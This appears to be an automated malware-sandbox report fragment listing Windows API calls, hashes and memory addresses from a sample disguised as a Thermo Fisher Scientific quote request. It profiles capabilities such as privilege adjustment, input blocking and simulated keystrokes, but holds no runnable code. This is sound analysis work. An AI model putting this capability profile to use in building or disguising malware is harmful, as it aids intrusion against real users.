                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: eb316f7923fd3236fb4b87c3fa6ad3322a04f47487640abdda5fd1cacc199714
                                                              • Instruction ID: 9e76a45892e8508d4454e1a0d7cca5fdf39f93f011423818825c1f2a71d8de89
                                                              • Opcode Fuzzy Hash: eb316f7923fd3236fb4b87c3fa6ad3322a04f47487640abdda5fd1cacc199714
                                                              • Instruction Fuzzy Hash: F6216D75A00118EFCB40EFA5D884EEEBBBAFF48310F0484A9E945A7391DB319955CB64
                                                              APIs
                                                                • Part of subcall function 0061F4EA: std::exception::exception.LIBCMT ref: 0061F51E
                                                                • Part of subcall function 0061F4EA: __CxxThrowException@8.LIBCMT ref: 0061F533
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063B180
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063B1AD
                                                              • GetLastError.KERNEL32 ref: 0063B1BA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: aa639252c42bbd6d6fd41540e4c59e09a06bc08594837cd6cc3b47dd8cf3f53c
                                                              • Instruction ID: 611c4db014a222a8f24b7b6392a291c7592020b4e89de073fad4b6de6939be1f
                                                              • Opcode Fuzzy Hash: aa639252c42bbd6d6fd41540e4c59e09a06bc08594837cd6cc3b47dd8cf3f53c
                                                              • Instruction Fuzzy Hash: 87118FB1504205AFE7189F54DC85D6BB7AEFB44710B20852EE55697251DB70FC418B60
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00646623
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00646664
                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0064666F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              • Opcode ID: 4875530a681d0b1ee336c962a939f0d34a70200ec1d77c8dcb94075669f12a7d
                                                              • Instruction ID: 83c742b3a1b3628d3e121b2ce36ddcf3b19aecd3118b9ec893f5c5902ba879ac
                                                              • Opcode Fuzzy Hash: 4875530a681d0b1ee336c962a939f0d34a70200ec1d77c8dcb94075669f12a7d
                                                              • Instruction Fuzzy Hash: D9111E71E01228BFDB109FA9DC45BAEBBBDEB45B50F104156F900E6290D7B05E058BA6
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00647223
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0064723A
                                                              • FreeSid.ADVAPI32(?), ref: 0064724A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: ac7c4d7a3a2df0c6c75827b3e6fd8f3c965372f6e114880286556747f42f1907
                                                              • Instruction ID: d4062b7788fc282c1e8630578eedd70039cb9cbe2df4172a7506773eb65dc1ce
                                                              • Opcode Fuzzy Hash: ac7c4d7a3a2df0c6c75827b3e6fd8f3c965372f6e114880286556747f42f1907
                                                              • Instruction Fuzzy Hash: 66F01D76A04309BFDF04DFE4DD89AEEBBB9EF08201F505569A602E21D1E3709A449B20
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0064F599
                                                              • FindClose.KERNEL32(00000000), ref: 0064F5C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 155e43f33cd894f1116491a06eb2868e2c9651d3f705d2e8bfc4ddb3eb1497ec
                                                              • Instruction ID: 05b8c221421b6f8bfb26005e3b46d28eb8a4a807c4998aeff02920d834ae3fc8
                                                              • Opcode Fuzzy Hash: 155e43f33cd894f1116491a06eb2868e2c9651d3f705d2e8bfc4ddb3eb1497ec
                                                              • Instruction Fuzzy Hash: 5111C4716002009FD744EF28D849A6EB3EAFF94324F048A1EF9A5D7391DB70AD018B95
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0065BE6A,?,?,00000000,?), ref: 0064CEA7
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0065BE6A,?,?,00000000,?), ref: 0064CEB9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 1dd14c47aec4504b4b3a5d2baaad5c73b2dab56646f996fabb99e3c91a6445ff
                                                              • Instruction ID: 7e9d323d881291aad2e6943455f9c440edb0d3c1fc38192858ca2a12043f9ebe
                                                              • Opcode Fuzzy Hash: 1dd14c47aec4504b4b3a5d2baaad5c73b2dab56646f996fabb99e3c91a6445ff
                                                              • Instruction Fuzzy Hash: 0EF08231100329BBDB50DBA4DC49FEA777EBF09361F004265F915D61C1D7309A40CBA1
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00644153
                                                              • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00644166
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InputSendkeybd_event
                                                              • String ID:
                                                              • API String ID: 3536248340-0
                                                              • Opcode ID: be2053521a07125c70c679b0d30dced545d725f81965f3d463346b4847776965
                                                              • Instruction ID: 0a3720c1d3e89ec72b2a5ac30382388bc3151823f03d03c97b0b5fa2e54cb738
                                                              • Opcode Fuzzy Hash: be2053521a07125c70c679b0d30dced545d725f81965f3d463346b4847776965
                                                              • Instruction Fuzzy Hash: B3F0677080028DAFDB058FA0C806BBE7BB1EF00305F00801AF966A6292D7798612DFA0
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0063ACC0), ref: 0063AB99
                                                              • CloseHandle.KERNEL32(?,?,0063ACC0), ref: 0063ABAB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 351631650e4844862da2ed48188f08aacea382701e3b433763bbf0070a58730f
                                                              • Instruction ID: 3dcb501902127fd5f78017e2f48cacb350450683eda09b41ce6bc81442246d02
                                                              • Opcode Fuzzy Hash: 351631650e4844862da2ed48188f08aacea382701e3b433763bbf0070a58730f
                                                              • Instruction Fuzzy Hash: C2E0BF71000510AFE7652F54EC05DB6B7ABEB04320B14852DB49A81470D7625C90AB50
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00626DB3,-0000031A,?,?,00000001), ref: 006281B1
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006281BA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 6b874024b9d55f3249db78c10e4bf4959a07b0f4b78c4628eaf544d11009e03b
                                                              • Instruction ID: f8e82ec068534a0bf16395931177475c382e7c8a7426cb2fa5c2807f3400f118
                                                              • Opcode Fuzzy Hash: 6b874024b9d55f3249db78c10e4bf4959a07b0f4b78c4628eaf544d11009e03b
                                                              • Instruction Fuzzy Hash: FEB09231084608FBDB002BA1EC09B587F6AEB0A652F005120F60D840A18B7254108BA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31d364e22573fed2398247715b8df3877d85e5132d84c0b3aec9de883c2740ce
                                                              • Instruction ID: 53a5ca5055266614d434b1dd8359d8c74a7a7ed04d5e0d73d6ab3964721ac65d
                                                              • Opcode Fuzzy Hash: 31d364e22573fed2398247715b8df3877d85e5132d84c0b3aec9de883c2740ce
                                                              • Instruction Fuzzy Hash: AA32F321D29F114DD7239A34D932335A28EAFB73D4F15D727E819B5EA6DB29C4C34500
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: 4d60d791f8351e20476f3922e360a6a38d316e38cc47dae9b77c40cae4b6899c
                                                              • Instruction ID: 6384bbae90ba7379b8b1c298a108feee46330ab9c5f9f7a783316450d0da0b9f
                                                              • Opcode Fuzzy Hash: 4d60d791f8351e20476f3922e360a6a38d316e38cc47dae9b77c40cae4b6899c
                                                              • Instruction Fuzzy Hash: 3922CB716483019FC768DF24C890BAFB7E7AF84310F14891DF89A87292DB71E945CB96
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb145a1757f0daa557abba2e5027028082734df1e2c22f17434753e773f3edd9
                                                              • Instruction ID: b96096fdb3c4d171ae544d68d14bf259bf9e85c58d2a684b14b7d7f29415d5d7
                                                              • Opcode Fuzzy Hash: fb145a1757f0daa557abba2e5027028082734df1e2c22f17434753e773f3edd9
                                                              • Instruction Fuzzy Hash: C2B1F220D2AF414DD7239A398831336B65DAFBB2D5F91E71BFC1B74D22EB2185934280
                                                              APIs
                                                              • __time64.LIBCMT ref: 0064B6DF
                                                                • Part of subcall function 0062344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0064BDC3,00000000,?,?,?,?,0064BF70,00000000,?), ref: 00623453
                                                                • Part of subcall function 0062344A: __aulldiv.LIBCMT ref: 00623473
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: 52fa95e48d02c8cad3f1fd163114cc1197fc29a7c7b54922a837f374802a1a25
                                                              • Instruction ID: 19039a4adec714644bd70c8f1559b6c7edde0051cb9ea80101a812aef62f53ca
                                                              • Opcode Fuzzy Hash: 52fa95e48d02c8cad3f1fd163114cc1197fc29a7c7b54922a837f374802a1a25
                                                              • Instruction Fuzzy Hash: 652160726345508BC729CF28D881AA2B7E6EB95310B249E6DE4E5CB280CB74E905DB54
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00656ACA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              • Opcode ID: 3e51d9dd7ebccd49149c85e89fcf45f69f871b02b8599412e198f979d5e18ee3
                                                              • Instruction ID: 549c413e6816779022c4fd7ae89feee6752ab2784a96370d15664ba4404aa242
                                                              • Opcode Fuzzy Hash: 3e51d9dd7ebccd49149c85e89fcf45f69f871b02b8599412e198f979d5e18ee3
                                                              • Instruction Fuzzy Hash: 9DE048352102046FD740EFA9D404D96B7EEAF74751F04C41AFA46D7391DAB0F8448BA0
                                                              APIs
                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0064750A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: 05a1c77f54c7997062911eadd2489aeaba5935cd997820a323e7ccde0de286a6
                                                              • Instruction ID: 394b97c15044235bf9c8d7b27be0cdc41236fcf9c4bd153b99b49bf0dbf656a7
                                                              • Opcode Fuzzy Hash: 05a1c77f54c7997062911eadd2489aeaba5935cd997820a323e7ccde0de286a6
                                                              • Instruction Fuzzy Hash: E6D05EA016C24438EF1D03209D1BFF7064BF302784FD445497203DD1C0AED05D02A031
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0063AD3E), ref: 0063B124
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: ab9bf0833e1f4fd558e019c13e507994fff6790c994050b6a7e48eb2a33bc77e
                                                              • Instruction ID: 72b701f45cf51a9a2234e6275b2d22ef73311c99fdb8140b6bc6ac4ebf46629e
                                                              • Opcode Fuzzy Hash: ab9bf0833e1f4fd558e019c13e507994fff6790c994050b6a7e48eb2a33bc77e
                                                              • Instruction Fuzzy Hash: E2D05E320A460EBEDF024FA4EC02EAE3F6AEB04700F408110FA11C50A0C671D531AB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 24031d6b1888f41c693e98fced6f62cb9947d94b58fb3537fbb1f87fdb0f8191
                                                              • Instruction ID: cce53cd12cdb73e24807e3c7728b28b2338e0e7963c0e3ba12e9eae479a3bc03
                                                              • Opcode Fuzzy Hash: 24031d6b1888f41c693e98fced6f62cb9947d94b58fb3537fbb1f87fdb0f8191
                                                              • Instruction Fuzzy Hash: 1FC04CB1400109EFCB51DFC0C9449EEB7BDAB04305F1051919105F1150D7709B459B77
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0062818F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b5194f7aa33e3ab3459dd9615e7f7435584d9979c8c18ce3816db1a9b8b53492
                                                              • Instruction ID: 378bbfba25b982d2be52b629b3f8c226c43814844a59b4e498c0aebfb9eed808
                                                              • Opcode Fuzzy Hash: b5194f7aa33e3ab3459dd9615e7f7435584d9979c8c18ce3816db1a9b8b53492
                                                              • Instruction Fuzzy Hash: C4A0223008020CFBCF002F82FC08C883F2EFB022A0B000020F80C80030CB33A8208BE2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
